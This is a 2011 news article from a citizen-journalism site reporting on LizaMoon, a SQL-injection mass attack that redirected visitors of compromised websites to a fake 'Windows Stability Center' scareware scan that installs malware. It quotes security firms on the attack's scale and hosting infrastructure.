LizaMoon: Scareware Attack Hits 1.5 Million Websites

Share: Email Story Twitter Facebook Stumbleupon Add to Any
by Jordan Yerman | April 1, 2011 at 03:49 pm
389 views | 2 Recommendations | 1 comment

LizaMoon Mass-Injection Attack Touts 'Windows Stability Center' Malware

There's a mass-injection attack spreading across the web called LizaMoon. LizaMoon hijacks visitors to infected sites and reroutes them to a scareware site. The attack adds code to the targeted site which causes the redirect. Oddly, the redirect only occurs once per IP address: if you get rerouted and don't take the bait, your next visit to the infected site will be uninterrupted.

Once redirected to the scareware site, the user is presented with a popup window that says that the computer is at risk. Clicking OK takes the user to "Windows Stability Center", which performs a fake scan of your system.

There's no such thing as Windows Stability Center: this is just a series of JS executions, and not a real depiction of the user's machine. Once the fake-ass scan is done, the user is prompted to remove the "viruses". Clicking Remove All will, of course, install malware. Pwned.

Web security firms are not yet sure which vulnerablity is being exploited in the LizaMoon attack, which is named after the first site to have been compromised. Antivirus products are not widely recognizing the Windows Stability Center malware.

List of Infected Sites

WebSense is builing a list of infected sites, but the number is astronomical-- and still growing. LizaMoon has not been contained. URLs associated with the iTunes Music Store have been infected.

Let's turn it over to WebSense:

Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs but that number could be over-inflated. It's safe to say it's in the hundreds of thousands.

 

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

Source: community.websense.com

The domains used in this attack, including the redirect URLs and the server where the malware is hosted, are all associated with one of four IP addresses, according to Dancho Danchev, an independent security expert. While the 20 or so domains being used as the redirect URL rotate between two IP addresses, Danchev has identified more than 120 India-based or Cocos Island-based domains all pointing to one malware host server, and 50 India-based domains going to another.

Source: eweek.com

Videos

LizaMoon mass injection explained

see larger video

sourced by Jordan Yerman

LizaMoon mass injection explained
Advertisement
Share: email story | add to any | | facebook | stumbleupon

Most RecentMost Recommended Comments (1)

recommend This comment thread is now closed
0
Tenea Bogdan
Tenea Bogdan (not verified)

at 20:02 on April 1st, 2011

I am now trying to work on a quick-fix for infected sites. For this I need examples of infected files. Please help by uploading your infected web-sites at http lizamoon.tenea.eu

This story was created over 3 months ago, the comment thread is now closed.

in , , , , , ,

NowPublic on Facebook

What is NowPublic?

NowPublic lets people work together to cover news events around the world.

Find out more

Crowd Power

YankeeJim
First Flagged at 6:09 AM, Apr 2, 2011 by YankeeJim
These members have powered this story:

Related Stories

Recommendations (2)

Most recently recommended by:
  • YankeeJim

    YankeeJim
    Arlington, Virginia, United States

Track this Story

 

closeSign in to NowPublic

Not a member?

JoinIt's free!

is reporting from
Member
NP Rank: